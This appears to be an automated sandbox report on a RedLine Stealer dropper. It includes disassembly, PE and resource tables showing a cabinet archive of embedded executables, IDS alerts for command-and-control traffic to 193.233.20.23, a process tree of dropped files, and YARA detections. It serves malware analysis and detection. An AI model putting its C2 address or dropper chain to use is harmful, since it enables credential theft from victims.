                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      call 00007F8B4C6D5925h
                                                                                                                                                                                                      jmp 00007F8B4C6D5235h
                                                                                                                                                                                                      push 00000058h
                                                                                                                                                                                                      push 004072B8h
                                                                                                                                                                                                      call 00007F8B4C6D59C7h
                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                      mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                      lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                      push eax
                                                                                                                                                                                                      call dword ptr [0040A184h]
                                                                                                                                                                                                      mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                      mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                      mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                      mov edi, ebx
                                                                                                                                                                                                      mov edx, 004088ACh
                                                                                                                                                                                                      mov ecx, esi
                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                      je 00007F8B4C6D524Ah
                                                                                                                                                                                                      cmp eax, esi
                                                                                                                                                                                                      jne 00007F8B4C6D5239h
                                                                                                                                                                                                      xor esi, esi
                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                      mov edi, esi
                                                                                                                                                                                                      jmp 00007F8B4C6D5242h
                                                                                                                                                                                                      push 000003E8h
                                                                                                                                                                                                      call dword ptr [0040A188h]
                                                                                                                                                                                                      jmp 00007F8B4C6D5209h
                                                                                                                                                                                                      xor esi, esi
                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                      cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                      jne 00007F8B4C6D523Ch
                                                                                                                                                                                                      push 0000001Fh
                                                                                                                                                                                                      call 00007F8B4C6D575Bh
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      jmp 00007F8B4C6D526Ch
                                                                                                                                                                                                      cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                      jne 00007F8B4C6D525Eh
                                                                                                                                                                                                      mov dword ptr [004088B0h], esi
                                                                                                                                                                                                      push 004010C4h
                                                                                                                                                                                                      push 004010B8h
                                                                                                                                                                                                      call 00007F8B4C6D5386h
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                      je 00007F8B4C6D5249h
                                                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                      mov eax, 000000FFh
                                                                                                                                                                                                      jmp 00007F8B4C6D5369h
                                                                                                                                                                                                      mov dword ptr [004081E4h], esi
                                                                                                                                                                                                      cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                      jne 00007F8B4C6D524Dh
                                                                                                                                                                                                      push 004010B4h
                                                                                                                                                                                                      push 004010ACh
                                                                                                                                                                                                      call 00007F8B4C6D5915h
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x10b7c4.rsrc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000x888.reloc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .rsrc0xc0000x10c0000x10b800False0.9654159973714953data7.954331200269156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .reloc0x1180000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                      AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                      RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                      RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                      RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                      RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                      RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                      RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                      RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                      RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                      RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                      RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                      RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                      RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                      RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                      RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                      RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x28bb00xedae0Microsoft Cabinet archive data, many, 973536 bytes, 2 files, at 0x2c +A "szV94FU13.exe" +A "rWE40pD80.exe", ID 2077, number 1, 36 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166900x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166940x24dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166b80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166c00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166c80x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166cc0xedataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166dc0x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166e00xedataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166f00x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166f40x5ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1166fc0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x1167040x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_GROUP_ICON0x11670c0xbcdataEnglishUnited States
                                                                                                                                                                                                      RT_VERSION0x1167c80x408dataEnglishUnited States
                                                                                                                                                                                                      RT_VERSION0x116bd00x410dataRussianRussia
                                                                                                                                                                                                      RT_MANIFEST0x116fe00x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                      KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                      GDI32.dllGetDeviceCaps
                                                                                                                                                                                                      USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                      msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                      COMCTL32.dll
                                                                                                                                                                                                      Cabinet.dll
                                                                                                                                                                                                      VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                      EnglishUnited States
                                                                                                                                                                                                      RussianRussia
                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      193.233.20.23192.168.2.44123496952043234 02/27/23-11:39:10.429997TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      192.168.2.4193.233.20.234969541232043231 02/27/23-11:39:21.135506TCP2043231ET TROJAN Redline Stealer TCP CnC Activity496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      192.168.2.4193.233.20.234969541232043233 02/27/23-11:39:08.913244TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Feb 27, 2023 11:39:08.522212982 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:08.544389963 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:08.544508934 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:08.913244009 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:08.935796976 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:08.986814022 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:10.407458067 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:10.429996967 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:10.471339941 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:17.281985998 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:17.305660009 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:17.305713892 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:17.305732965 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:17.307555914 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:18.284384966 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:18.307071924 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:18.342612982 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:18.365082979 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:18.522150993 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.258249044 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.280755997 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.282398939 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.304991961 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.348175049 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.370678902 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.487677097 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.706926107 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.729378939 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.828773022 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.851257086 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:19.891737938 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.050028086 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.073169947 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.190898895 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.234889984 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.257138014 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.257513046 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.372709990 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.395013094 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.395488024 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.443651915 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.465847015 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.465907097 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.466536999 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.483655930 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.506293058 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.509649992 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.532846928 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.581556082 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.975769043 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:20.998248100 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.057123899 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.079766035 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.087624073 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.110258102 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.111568928 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.134205103 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.135505915 CET496954123192.168.2.4193.233.20.23
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.158057928 CET412349695193.233.20.23192.168.2.4
                                                                                                                                                                                                      Feb 27, 2023 11:39:21.201046944 CET496954123192.168.2.4193.233.20.23

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:11:38:40
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\iOqzwbUlln.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\iOqzwbUlln.exe
                                                                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                                                                      File size:1129984 bytes
                                                                                                                                                                                                      MD5 hash:FC3E0027FFEAD1129ACCEDCB4814E96F
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                      Start time:11:38:40
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                      File size:982016 bytes
                                                                                                                                                                                                      MD5 hash:43AC4F54070D2E111D56AF37CF9C2765
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 62%, ReversingLabs
                                                                                                                                                                                                      • Detection: 54%, Virustotal, Browse
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                      Start time:11:38:41
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                                                                                                                                                                                                      Imagebase:0x1f0000
                                                                                                                                                                                                      File size:698368 bytes
                                                                                                                                                                                                      MD5 hash:8906052E48565395A2A7E5B0D6584C7E
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 59%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                      Start time:11:38:42
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                                                                                                                                                                                                      Imagebase:0xde0000
                                                                                                                                                                                                      File size:409088 bytes
                                                                                                                                                                                                      MD5 hash:64653075A4A9CF43333AE22B968159AB
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 62%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                      Start time:11:38:42
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                                                                                                                                                                                                      Imagebase:0x320000
                                                                                                                                                                                                      File size:11713 bytes
                                                                                                                                                                                                      MD5 hash:CA6D279F0C8A205BFA0F8878D8F7BA2A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 76%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:11:38:53
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:319488 bytes
                                                                                                                                                                                                      MD5 hash:1DC889EA2A05C7C4D829060CABE98814
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
